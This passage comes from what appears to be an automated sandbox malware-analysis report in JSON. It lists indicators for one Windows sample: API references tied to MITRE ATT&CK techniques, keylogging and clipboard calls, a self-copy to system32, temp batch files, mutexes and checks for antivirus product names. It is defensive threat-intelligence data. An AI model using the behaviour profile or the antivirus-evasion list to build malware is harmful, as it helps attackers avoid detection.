\"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenEventLogA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseEventLog\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenSCManagerA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenServiceA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseServiceHandle\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteService\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetClipboardData\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenClipboard\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowTextA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetAsyncKeyState\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseClipboard\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetClassNameA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"PostMessageA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumChildWindows\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindowVisible\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumWindows\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitWindowsEx\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetReadFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetConnectA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCrackUrlA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WSASocketA\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WSAIoctl\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005068.00000000.140099.00423000.00000040.mdmp, 00000000-00005068.00000001.140461.00423000.00000040.mdmp\")\n Found reference to API (Indicator: \"WinHelp\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetGetConnectedStateEx\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005392.00000000.140409.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-242", "type": 2, "relevance": 1, "name": "Contains ability to close a handle to a service (API string)", "description": "Found reference to API \"CloseServiceHandle\" (Indicator: \"CloseServiceHandle\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"CloseServiceHandle\" (Indicator: \"CloseServiceHandle\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-191", "type": 2, "relevance": 1, "name": "Able to enumerate service (API string)", "description": "Found reference to API \"QueryServiceStatus\" (Indicator: \"QueryServiceStatus\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"OpenSCManagerA\" (Indicator: \"OpenSCManager\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"EnumDependentServicesA\" (Indicator: \"EnumDependentServices\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"QueryServiceStatus\" (Indicator: \"QueryServiceStatus\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"EnumDependentServicesA\" (Indicator: \"EnumDependentServices\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"OpenSCManagerA\" (Indicator: \"OpenSCManager\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2585.bat\"\n \"dllconf.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2908.bat\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"CopyFileA\" to copy C:\\e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe to new location \\dllconf.exe (UID: 00000000-00005056)\n \"dllconf.exe\" called \"CopyFileA\" to copy C:\\dllconf.exe to new location %WINDIR%\\system32\\dllconf.exe (UID: 00000000-00005068)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Aeb-75\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Aeb-75\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-8", "type": 2, "relevance": 2, "name": "Possibly checks for the presence of an Antivirus engine", "description": "\"McShield.exe\" (Indicator: \"mcshield.exe\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"zonealarm.exe\" (Indicator: \"zonealarm\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"NAVSCAN32.exe\" (Indicator: \"scan32.exe\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"KasperskyAVEng\" (Indicator: \"kaspersky\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"KasperskyAv\" (Indicator: \"kaspersky\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Antivirus\" (Indicator: \"antivirus\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"ZoneAlarm Pro\" (Indicator: \"zonealarm\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"ZoneAlarm\" (Indicator: \"zonealarm\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Nod32CC\" (Indicator: \"nod32\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"bitdefenderlive\" (Indicator: \"bitdefender\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"Avast32\" (Indicator: \"avast\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"www.bitdefender.com\" (Indicator: \"bitdefender\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"www.trendmicro.com\" (Indicator: \"trendmicro\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"trendmicro.com\" (Indicator: \"trendmicro\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"www.kaspersky.com\" (Indicator: \"kaspersky\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"kaspersky.com\" (Indicator: \"kaspersky\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"www.f-secure.com\" (Indicator: \"f-secure\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"f-secure.com\" (Indicator: \"f-secure\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"sophos.com\" (Indicator: \"sophos\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"mcafee.com\" (Indicator: \"mcafee\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"symantec.com\" (Indicator: \"symantec\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"www.symantec.com\" (Indicator: \"symantec\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n \"AntiVirusOverride\" (Indicator: \"antivirus\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33", "origin": "File/Memory", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/4.0 (compatible)\" (Indicator: \"mozilla/4.0 (\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"Mozilla/4.0 (compatible)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005056.00000000.139963.00640000.00000004.mdmp, 00000000-00005056.00000001.140381.00640000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005068.00000000.140099.00270000.00000004.mdmp, 00000000-00005068.00000001.140461.00270000.00000004.mdmp, 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter RegisterServiceProcess (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedState (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedStateEx (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW 